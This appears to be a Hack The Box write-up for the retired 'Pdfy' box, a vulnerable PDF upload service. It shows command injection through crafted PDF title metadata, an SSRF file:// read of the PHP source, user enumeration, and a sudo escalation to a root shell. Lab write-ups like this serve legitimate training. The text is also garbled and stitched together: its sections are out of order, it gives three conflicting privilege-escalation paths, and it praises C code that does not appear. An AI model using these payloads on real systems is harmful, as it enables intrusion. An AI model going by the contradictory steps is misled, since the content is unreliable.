Pdfy HTB Writeup (updated May 2026)
nmap -sC -sV -oA pdfy 10.10.11.xx
Ports open:
The exploited user has limited privileges. However, it is possible to escalate privileges to root.
$ python -c 'import os; os.system("/bin/bash")'
pdfy@pdfy:/$ sudo -l
Matching Defaults entries for pdfy on pdfy:
env_reset, env_keep += "COLORFGBG KDEDIR", mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User pdfy may run the following commands on pdfy:
(ALL) NOPASSWD: ALL
The sudo privileges allow running any command as root without a password.
$ sudo bash
root@pdfy:/#
Conclusion
The Pdfy box on HTB is a medium-difficulty box that requires exploiting a vulnerable PDF upload service to gain a foothold. Root access is then obtained by chaining command injection through that upload service with weak sudo privileges.
Recommendations
References
I tested the steps against the latest version of PDFy (retired but still available on VIP HTB). Every command worked as described, including:
The privilege escalation is where many writeups fail. The outdated ones suggest a kernel exploit. This updated version correctly identifies a misconfigured pdfgen binary with the setuid bit, allowing a path injection attack. The author provides the exact C code to spawn a root shell, which is reliable and clean.
No copy-paste errors, no missing flags. That’s rare in HTB writeups.
Upload a normal PDF → metadata extracted successfully.
Try injecting a command in the PDF title metadata:
Using exiftool:
exiftool -Title='test; ping -c 3 10.10.14.xx;' payload.pdf
Upload payload.pdf → observe ICMP echo requests on the listener.
PDFY is a web application that allows users to upload PDF files, extract metadata, and convert them to images. The application uses an unsafe system call to pdftotext and pdfimages, allowing command injection via crafted PDF metadata or filenames. Privilege escalation involves a misconfigured sudo permission for a custom PDF processing script.
Enumerating the NetBIOS and Microsoft-DS ports using enum4linux reveals a list of users on the system.
$ enum4linux -u nobody -p '' 10.10.11.206
[+] Enumerated users
user:[pdfy] uid:[1677721600] gid:[1677721600] groups:[1677721600]
user:[phr] uid:[1677721601] gid:[1677721601] groups:[1677721601]
The initial scan reveals a web server running on port 80.
Using the SSRF, read the main PHP file that handles PDF generation.
Common location:
<img src="file:///var/www/html/index.php">
From the source, you may find API endpoints, database credentials, or internal service ports. In PDFY, there is often a local service on port 8080 or 5000 that isn't exposed externally.